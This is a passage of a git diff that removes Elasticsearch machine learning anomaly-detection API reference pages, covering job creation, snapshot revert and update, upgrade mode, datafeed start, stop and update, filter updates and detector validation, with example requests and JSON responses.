-[[put-analysislimits]]`analysis_limits`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=analysis-limits] -+ -.Properties of `analysis_limits` -[%collapsible%open] -==== -`categorization_examples_limit`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorization-examples-limit] - -`model_memory_limit`::: -(long or string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-memory-limit] -==== -//End analysis_limits - -`background_persist_interval`:: -(Optional, <>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=background-persist-interval] - -[[put-customsettings]]`custom_settings`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-settings] - -//Begin data_description -[[put-datadescription]]`data_description`:: -(Required, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=data-description] -//End data_description - -`daily_model_snapshot_retention_after_days`:: -(Optional, long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=daily-model-snapshot-retention-after-days] - -`description`:: -(Optional, string) A description of the job. - -`groups`:: -(Optional, array of strings) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=groups] - -//Begin model_plot_config -`model_plot_config`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config] -+ -.Properties of `model_plot_config` -[%collapsible%open] -==== -`annotations_enabled`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config-annotations-enabled] - -`enabled`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config-enabled] - -`terms`::: -experimental[] (string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config-terms] -==== -//End model_plot_config - -`model_snapshot_retention_days`:: -(Optional, long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-snapshot-retention-days] - -`renormalization_window_days`:: -(Optional, long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=renormalization-window-days] - -`results_index_name`:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=results-index-name] - -`results_retention_days`:: -(Optional, long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=results-retention-days] - -[[ml-put-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/total-requests -{ - "description" : "Total sum of requests", - "analysis_config" : { - "bucket_span":"10m", - "detectors": [ - { - "detector_description": "Sum of total", - "function": "sum", - "field_name": "total" - } - ] - }, - "data_description" : { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- - -When the job is created, you receive the following results: - -[source,console-result] ----- -{ - "job_id" : "total-requests", - "job_type" : "anomaly_detector", - "job_version" : "7.5.0", - "description" : "Total sum of requests", - "create_time" : 1562352500629, - "analysis_config" : { - "bucket_span" : "10m", - "detectors" : [ - { - "detector_description" : "Sum of total", - "function" : "sum", - "field_name" : "total", - "detector_index" : 0 - } - ], - "influencers" : [ ] - }, - "analysis_limits" : { - "model_memory_limit" : "1024mb", - "categorization_examples_limit" : 4 - }, - "data_description" : { - "time_field" : "timestamp", - "time_format" : "epoch_ms" - }, - "model_snapshot_retention_days" : 10, - "daily_model_snapshot_retention_after_days" : 1, - "results_index_name" : "shared", - "allow_lazy_open" : false -} ----- -// TESTRESPONSE[s/"job_version" : "7.5.0"/"job_version" : $body.job_version/] -// TESTRESPONSE[s/1562352500629/$body.$_path/] diff --git a/docs/reference/ml/anomaly-detection/apis/revert-snapshot.asciidoc b/docs/reference/ml/anomaly-detection/apis/revert-snapshot.asciidoc deleted file mode 100644 index e0790527728..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/revert-snapshot.asciidoc +++ /dev/null @@ -1,118 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-revert-snapshot]] -= Revert model snapshots API -++++ -Revert model snapshots -++++ - -Reverts to a specific snapshot. - -[[ml-revert-snapshot-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors//model_snapshots//_revert` - -[[ml-revert-snapshot-prereqs]] -== {api-prereq-title} - -* Before you revert to a saved snapshot, you must close the job. -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - - -[[ml-revert-snapshot-desc]] -== {api-description-title} - -The {ml-features} reacts quickly to anomalous input, learning new -behaviors in data. Highly anomalous input increases the variance in the models -whilst the system learns whether this is a new step-change in behavior or a -one-off event. In the case where this anomalous input is known to be a one-off, -then it might be appropriate to reset the model state to a time before this -event. For example, you might consider reverting to a saved snapshot after Black -Friday or a critical system failure. - -NOTE: Reverting to a snapshot does not change the `data_counts` values of the -{anomaly-job}, these values are not reverted to the earlier state. - - -[[ml-revert-snapshot-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=snapshot-id] - - -[[ml-revert-snapshot-request-body]] -== {api-request-body-title} - -`delete_intervening_results`:: - (Optional, Boolean) If true, deletes the results in the time period between - the latest results and the time of the reverted snapshot. It also resets the - model to accept records for this time period. The default value is false. - -NOTE: If you choose not to delete intervening results when reverting a snapshot, -the job will not accept input data that is older than the current time. -If you want to resend data, then delete the intervening results. - - -[[ml-revert-snapshot-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/high_sum_total_sales/model_snapshots/1575402237/_revert -{ - "delete_intervening_results": true -} --------------------------------------------------- -// TEST[skip:Kibana sample data] - - -When the operation is complete, you receive the following results: -[source,js] ----- -{ - "model" : { - "job_id" : "high_sum_total_sales", - "min_version" : "6.4.0", - "timestamp" : 1575402237000, - "description" : "State persisted due to job close at 2019-12-03T19:43:57+0000", - "snapshot_id" : "1575402237", - "snapshot_doc_count" : 1, - "model_size_stats" : { - "job_id" : "high_sum_total_sales", - "result_type" : "model_size_stats", - "model_bytes" : 1638816, - "model_bytes_exceeded" : 0, - "model_bytes_memory_limit" : 10485760, - "total_by_field_count" : 3, - "total_over_field_count" : 3320, - "total_partition_field_count" : 2, - "bucket_allocation_failures_count" : 0, - "memory_status" : "ok", - "categorized_doc_count" : 0, - "total_category_count" : 0, - "frequent_category_count" : 0, - "rare_category_count" : 0, - "dead_category_count" : 0, - "failed_category_count" : 0, - "categorization_status" : "ok", - "log_time" : 1575402237000, - "timestamp" : 1576965600000 - }, - "latest_record_time_stamp" : 1576971072000, - "latest_result_time_stamp" : 1576965600000, - "retain" : false - } -} ----- - -For a description of these properties, see the -<>. diff --git a/docs/reference/ml/anomaly-detection/apis/set-upgrade-mode.asciidoc b/docs/reference/ml/anomaly-detection/apis/set-upgrade-mode.asciidoc deleted file mode 100644 index 07f39f6c6a6..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/set-upgrade-mode.asciidoc +++ /dev/null @@ -1,98 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-set-upgrade-mode]] -= Set upgrade mode API -++++ -Set upgrade mode -++++ - -Sets a cluster wide upgrade_mode setting that prepares {ml} indices for an -upgrade. - -[[ml-set-upgrade-mode-request]] -== {api-request-title} -////////////////////////// - -[source,console] --------------------------------------------------- -POST /_ml/set_upgrade_mode?enabled=false&timeout=10m --------------------------------------------------- -// TEARDOWN - -////////////////////////// - - -`POST _ml/set_upgrade_mode` - -[[ml-set-upgrade-mode-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-set-upgrade-mode-desc]] -== {api-description-title} - -When upgrading your cluster, in some circumstances you must restart your nodes and -reindex your {ml} indices. In those circumstances, there must be no {ml} jobs running. -You can close the {ml} jobs, do the upgrade, then open all the jobs again. -Alternatively, you can use this API to temporarily halt tasks associated -with the jobs and {dfeeds} and prevent new jobs from opening. You can also use this -API during upgrades that do not require you to reindex your {ml} indices, -though stopping jobs is not a requirement in that case. - -For more information, see {stack-ref}/upgrading-elastic-stack.html[Upgrading the {stack}]. - -When `enabled=true` this API temporarily halts all job and {dfeed} tasks and -prohibits new job and {dfeed} tasks from starting. - -Subsequently, you can call the API with the enabled parameter set to false, -which causes {ml} jobs and {dfeeds} to return to their desired states. - -You can see the current value for the `upgrade_mode` setting by using the -<>. - -IMPORTANT: No new {ml} jobs can be opened while the `upgrade_mode` setting is -`true`. - -[[ml-set-upgrade-mode-query-parms]] -== {api-query-parms-title} - -`enabled`:: - (Optional, Boolean) When `true`, this enables `upgrade_mode`. Defaults to - `false`. - -`timeout`:: - (Optional, time) The time to wait for the request to be completed. The default - value is 30 seconds. - -[[ml-set-upgrade-mode-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/set_upgrade_mode?enabled=true&timeout=10m --------------------------------------------------- - -When the call is successful, an acknowledged response is returned. For example: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- - -The acknowledged response will only be returned once all {ml} jobs and {dfeeds} have -finished writing to the {ml} internal indices. This means it is safe to reindex those -internal indices without causing failures. You must wait for the acknowledged -response before reindexing to ensure that all writes are completed. - -When the upgrade is complete, you must set `upgrade_mode` to `false` for -{ml} jobs to start running again. For example: - -[source,console] --------------------------------------------------- -POST _ml/set_upgrade_mode?enabled=false&timeout=10m --------------------------------------------------- diff --git a/docs/reference/ml/anomaly-detection/apis/start-datafeed.asciidoc b/docs/reference/ml/anomaly-detection/apis/start-datafeed.asciidoc deleted file mode 100644 index 5bc306b0fc7..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/start-datafeed.asciidoc +++ /dev/null @@ -1,129 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-start-datafeed]] -= Start {dfeeds} API - -[subs="attributes"] -++++ -Start {dfeeds} -++++ - -Starts one or more {dfeeds}. - -[[ml-start-datafeed-request]] -== {api-request-title} - -`POST _ml/datafeeds//_start` - -[[ml-start-datafeed-prereqs]] -== {api-prereq-title} - -* Before you can start a {dfeed}, the {anomaly-job} must be open. Otherwise, an -error occurs. -* If {es} {security-features} are enabled, you must have `manage_ml` or `manage` -cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-start-datafeed-desc]] -== {api-description-title} - -A {dfeed} must be started in order to retrieve data from {es}. -A {dfeed} can be started and stopped multiple times throughout its lifecycle. - -When you start a {dfeed}, you can specify a start time. This enables you to -include a training period, providing you have this data available in {es}. -If you want to analyze from the beginning of a dataset, you can specify any date -earlier than that beginning date. - -If you do not specify a start time and the {dfeed} is associated with a new -{anomaly-job}, the analysis starts from the earliest time for which data is -available. - -When you start a {dfeed}, you can also specify an end time. If you do so, the -job analyzes data from the start time until the end time, at which point the -analysis stops. This scenario is useful for a one-off batch analysis. If you -do not specify an end time, the {dfeed} runs continuously. - -The `start` and `end` times can be specified by using one of the -following formats: + - -- ISO 8601 format with milliseconds, for example `2017-01-22T06:00:00.000Z` -- ISO 8601 format without milliseconds, for example `2017-01-22T06:00:00+00:00` -- Milliseconds since the epoch, for example `1485061200000` - -Date-time arguments using either of the ISO 8601 formats must have a time zone -designator, where Z is accepted as an abbreviation for UTC time. - -NOTE: When a URL is expected (for example, in browsers), the `+` used in time -zone designators must be encoded as `%2B`. - -If the system restarts, any jobs that had {dfeeds} running are also restarted. - -When a stopped {dfeed} is restarted, it continues processing input data from -the next millisecond after it was stopped. If new data was indexed for that -exact millisecond between stopping and starting, it will be ignored. -If you specify a `start` value that is earlier than the timestamp of the latest -processed record, the {dfeed} continues from 1 millisecond after the timestamp -of the latest processed record. - -IMPORTANT: When {es} {security-features} are enabled, your {dfeed} remembers -which roles the last user to create or update it had at the time of -creation/update and runs the query using those same roles. If you provided -<> when -you created or updated the {dfeed}, those credentials are used instead. - -[[ml-start-datafeed-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -[[ml-start-datafeed-request-body]] -== {api-request-body-title} - -`end`:: - (Optional, string) The time that the {dfeed} should end. This value is - exclusive. The default value is an empty string. - -`start`:: - (Optional, string) The time that the {dfeed} should begin. This value is - inclusive. The default value is an empty string. - -`timeout`:: - (Optional, time) Controls the amount of time to wait until a {dfeed} starts. - The default value is 20 seconds. - -[[ml-start-datafeed-response-body]] -== {api-response-body-title} - -`node`:: - (string) The ID of the node that the {dfeed} was started on. -If the {dfeed} is allowed to open lazily and has not yet been - assigned to a node, this value is an empty string. - -`started`:: - (Boolean) For a successful response, this value is always `true`. On failure, an - exception is returned instead. - -[[ml-start-datafeed-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/datafeeds/datafeed-total-requests/_start -{ - "start": "2017-04-07T18:22:16Z" -} --------------------------------------------------- -// TEST[skip:setup:server_metrics_openjob] - -When the {dfeed} starts, you receive the following results: - -[source,console-result] ----- -{ - "started" : true, - "node" : "node-1" -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/stop-datafeed.asciidoc b/docs/reference/ml/anomaly-detection/apis/stop-datafeed.asciidoc deleted file mode 100644 index 716010c01e9..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/stop-datafeed.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-stop-datafeed]] -= Stop {dfeeds} API - -[subs="attributes"] -++++ -Stop {dfeeds} -++++ - -Stops one or more {dfeeds}. - -[[ml-stop-datafeed-request]] -== {api-request-title} - -`POST _ml/datafeeds//_stop` + - -`POST _ml/datafeeds/,/_stop` + - -`POST _ml/datafeeds/_all/_stop` - -[[ml-stop-datafeed-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-stop-datafeed-desc]] -== {api-description-title} - -A {dfeed} that is stopped ceases to retrieve data from {es}. -A {dfeed} can be started and stopped multiple times throughout its lifecycle. - -You can stop multiple {dfeeds} in a single API request by using a -comma-separated list of {dfeeds} or a wildcard expression. You can close all -{dfeeds} by using `_all` or by specifying `*` as the ``. - -[[ml-stop-datafeed-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id-wildcard] - -[[ml-stop-datafeed-query-parms]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-datafeeds] - -[[ml-stop-datafeed-request-body]] -== {api-request-body-title} - -`force`:: - (Optional, Boolean) If true, the {dfeed} is stopped forcefully. - -`timeout`:: - (Optional, time) Controls the amount of time to wait until a {dfeed} stops. - The default value is 20 seconds. - -[[ml-stop-datafeed-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - -[[ml-stop-datafeed-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/datafeeds/datafeed-total-requests/_stop -{ - "timeout": "30s" -} --------------------------------------------------- -// TEST[skip:setup:server_metrics_startdf] - -When the {dfeed} stops, you receive the following results: - -[source,console-result] ----- -{ - "stopped": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/update-datafeed.asciidoc b/docs/reference/ml/anomaly-detection/apis/update-datafeed.asciidoc deleted file mode 100644 index 6f42c2a2358..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/update-datafeed.asciidoc +++ /dev/null @@ -1,152 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-update-datafeed]] -= Update {dfeeds} API - -[subs="attributes"] -++++ -Update {dfeeds} -++++ - -Updates certain properties of a {dfeed}. - - -[[ml-update-datafeed-request]] -== {api-request-title} - -`POST _ml/datafeeds//_update` - - -[[ml-update-datafeed-prereqs]] -== {api-prereq-title} - -* If {es} {security-features} are enabled, you must have `manage_ml`, or `manage` -cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - - -[[ml-update-datafeed-desc]] -== {api-description-title} - -If you update a {dfeed} property, you must stop and start the {dfeed} for the -change to be applied. - -IMPORTANT: When {es} {security-features} are enabled, your {dfeed} remembers -which roles the user who updated it had at the time of update and runs the query -using those same roles. If you provide -<>, those -credentials are used instead. - -[[ml-update-datafeed-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -[role="child_attributes"] -[[ml-update-datafeed-request-body]] -== {api-request-body-title} - -The following properties can be updated after the {dfeed} is created: - -`aggregations`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=aggregations] - -`chunking_config`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=chunking-config] - -`delayed_data_check_config`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=delayed-data-check-config] - -`frequency`:: -(Optional, <>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=frequency] - -`indices`:: -(Optional, array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=indices] - -`max_empty_searches`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=max-empty-searches] -+ --- -The special value `-1` unsets this setting. --- - -`query`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=query] -+ --- -WARNING: If you change the query, the analyzed data is also changed. Therefore, -the required time to learn might be long and the understandability of the -results is unpredictable. If you want to make significant changes to the source -data, we would recommend you clone it and create a second job containing the -amendments. Let both run in parallel and close one when you are satisfied with -the results of the other job. - --- - -`query_delay`:: -(Optional, <>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=query-delay] - -`script_fields`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=script-fields] - -`scroll_size`:: -(Optional, unsigned integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=scroll-size] - -`indices_options`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=indices-options] - -[[ml-update-datafeed-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/datafeeds/datafeed-total-requests/_update -{ - "query": { - "term": { - "level": "error" - } - } -} --------------------------------------------------- -// TEST[skip:setup:server_metrics_datafeed] - - -When the {dfeed} is updated, you receive the full {dfeed} configuration with -with the updated values: - -[source,console-result] ----- -{ - "datafeed_id": "datafeed-total-requests", - "job_id": "total-requests", - "query_delay": "83474ms", - "indices": ["server-metrics"], - "query": { - "term": { - "level": { - "value": "error", - "boost": 1.0 - } - } - }, - "scroll_size": 1000, - "chunking_config": { - "mode": "auto" - } -} ----- -// TESTRESPONSE[s/"query.boost": "1.0"/"query.boost": $body.query.boost/] diff --git a/docs/reference/ml/anomaly-detection/apis/update-filter.asciidoc b/docs/reference/ml/anomaly-detection/apis/update-filter.asciidoc deleted file mode 100644 index 51f9452e450..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/update-filter.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-update-filter]] -= Update filters API -++++ -Update filters -++++ - -Updates the description of a filter, adds items, or removes items. - -[[ml-update-filter-request]] -== {api-request-title} - -`POST _ml/filters//_update` - -[[ml-update-filter-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-update-filter-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=filter-id] - -[[ml-update-filter-request-body]] -== {api-request-body-title} - -`add_items`:: - (Optional, array of strings) The items to add to the filter. - -`description`:: - (Optional, string) A description for the filter. - -`remove_items`:: - (Optional, array of strings) The items to remove from the filter. - -[[ml-update-filter-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/filters/safe_domains/_update -{ - "description": "Updated list of domains", - "add_items": ["*.myorg.com"], - "remove_items": ["wikipedia.org"] -} --------------------------------------------------- -// TEST[skip:setup:ml_filter_safe_domains] - -The API returns the following results: - -[source,console-result] ----- -{ - "filter_id": "safe_domains", - "description": "Updated list of domains", - "items": ["*.google.com", "*.myorg.com"] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/update-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/update-job.asciidoc deleted file mode 100644 index 74d73cae8c0..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/update-job.asciidoc +++ /dev/null @@ -1,287 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-update-job]] -= Update {anomaly-jobs} API -++++ -Update jobs -++++ - -Updates certain properties of an {anomaly-job}. - -[[ml-update-job-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors//_update` - -[[ml-update-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - - -[[ml-update-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[role="child_attributes"] -[[ml-update-job-request-body]] -== {api-request-body-title} - -The following properties can be updated after the job is created: - -`allow_lazy_open`:: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-lazy-open] -+ --- -NOTE: If the job is open when you make the update, you must stop the {dfeed}, -close the job, then reopen the job and restart the {dfeed} for the changes to take effect. - --- -//Begin analysis_limits -[[update-analysislimits]]`analysis_limits`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=analysis-limits] -+ -.Properties of `analysis_limits` -[%collapsible%open] -==== -`model_memory_limit`::: -(long or string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-memory-limit] -+ --- -NOTE: You can update the `analysis_limits` only while the job is closed. The -`model_memory_limit` property value cannot be decreased below the current usage. - -TIP: If the `memory_status` property in the -<> has a value of -`hard_limit`, this means that it was unable to process some data. You might want -to re-run the job with an increased `model_memory_limit`. - --- -==== -//End analysis_limits - -`background_persist_interval`:: -(<>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=background-persist-interval] -+ --- -NOTE: If the job is open when you make the update, you must stop the {dfeed}, -close the job, then reopen the job and restart the {dfeed} for the changes to take effect. - --- - -[[update-customsettings]]`custom_settings`:: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-settings] - -`daily_model_snapshot_retention_after_days`:: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=daily-model-snapshot-retention-after-days] - -`description`:: -(string) A description of the job. - -//Begin detectors -`detectors`:: -(array) An array of detector update objects. -+ -.Properties of `detectors` -[%collapsible%open] -==== - -//Begin detectors.custom_rules -`custom_rules`::: -(array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules] -+ -.Properties of `custom_rules` -[%collapsible%open] -===== - -`actions`::: -(array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-actions] - -// Begin detectors.custom_rules.conditions -`conditions`::: -(array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions] -+ -.Properties of `conditions` -[%collapsible%open] -====== - -`applies_to`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions-applies-to] - -`operator`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions-operator] - -`value`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions-value] -====== -//End detectors.custom_rules.conditions - -//Begin detectors.custom_rules.scope -`scope`::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-scope] -+ -.Properties of `scope` -[%collapsible%open] -====== -`filter_id`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-scope-filter-id] - -`filter_type`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-scope-filter-type] -====== -//End detectors.custom_rules.scope -===== -//End detectors.custom_rules - -`description`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=detector-description] - -`detector_index`::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=detector-index] -+ --- -If you want to update a specific detector, you must use this identifier. You -cannot, however, change the `detector_index` value for a detector. --- -==== -//End detectors - -`groups`:: -(array of strings) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=groups] - -//Begin model_plot_config -`model_plot_config`:: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config] -+ -.Properties of `model_plot_config` -[%collapsible%open] -==== -`annotations_enabled`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config-annotations-enabled] - -`enabled`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config-enabled] - -`terms`::: -experimental[] (string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config-terms] -==== -//End model_plot_config - -`model_snapshot_retention_days`:: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-snapshot-retention-days] - -//Begin per_partition_categorization -`per_partition_categorization`::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=per-partition-categorization] -+ -.Properties of `per_partition_categorization` -[%collapsible%open] -==== -`enabled`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=per-partition-categorization-enabled] - -`stop_on_warn`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=per-partition-categorization-stop-on-warn] -==== -//End per_partition_categorization - -`renormalization_window_days`:: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=renormalization-window-days] -+ --- -NOTE: If the job is open when you make the update, you must stop the {dfeed}, -close the job, then reopen the job and restart the {dfeed} for the changes to take effect. - --- -`results_retention_days`:: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=results-retention-days] - - -[[ml-update-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/low_request_rate/_update -{ - "description":"An updated job", - "detectors": { - "detector_index": 0, - "description": "An updated detector description" - }, - "groups": ["kibana_sample_data","kibana_sample_web_logs"], - "model_plot_config": { - "enabled": true - }, - "renormalization_window_days": 30, - "background_persist_interval": "2h", - "model_snapshot_retention_days": 7, - "results_retention_days": 60 -} --------------------------------------------------- -// TEST[skip:setup:Kibana sample data] - -When the {anomaly-job} is updated, you receive a summary of the job -configuration information, including the updated property values. For example: - -[source,js] ----- -{ - "job_id" : "low_request_rate", - "job_type" : "anomaly_detector", - "job_version" : "7.5.1", - "groups" : [ - "kibana_sample_data", - "kibana_sample_web_logs" - ], - "description" : "An updated job", - "create_time" : 1578101716125, - "finished_time" : 1578101721816, - "analysis_config" : { - "bucket_span" : "1h", - "summary_count_field_name" : "doc_count", - "detectors" : [ - { - "detector_description" : "An updated detector description", - "function" : "low_count", - "detector_index" : 0 - } - ], - "influencers" : [ ] - }, - ... -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/update-snapshot.asciidoc b/docs/reference/ml/anomaly-detection/apis/update-snapshot.asciidoc deleted file mode 100644 index b637311e718..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/update-snapshot.asciidoc +++ /dev/null @@ -1,74 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-update-snapshot]] -= Update model snapshots API -++++ -Update model snapshots -++++ - -Updates certain properties of a snapshot. - -[[ml-update-snapshot-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors//model_snapshots//_update` - -[[ml-update-snapshot-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - - -[[ml-update-snapshot-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=snapshot-id] - -[[ml-update-snapshot-request-body]] -== {api-request-body-title} - -The following properties can be updated after the model snapshot is created: - -`description`:: -(Optional, string) A description of the model snapshot. - -`retain`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=retain] - -[[ml-update-snapshot-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST -_ml/anomaly_detectors/it_ops_new_logs/model_snapshots/1491852978/_update -{ - "description": "Snapshot 1", - "retain": true -} --------------------------------------------------- -// TEST[skip:todo] - -When the snapshot is updated, you receive the following results: -[source,js] ----- -{ - "acknowledged": true, - "model": { - "job_id": "it_ops_new_logs", - "timestamp": 1491852978000, - "description": "Snapshot 1", -... - "retain": true - } -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/validate-detector.asciidoc b/docs/reference/ml/anomaly-detection/apis/validate-detector.asciidoc deleted file mode 100644 index d588bb61d28..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/validate-detector.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-valid-detector]] -= Validate detectors API -++++ -Validate detectors -++++ - -Validates detector configuration information. - -[[ml-valid-detector-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors/_validate/detector` - -[[ml-valid-detector-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and 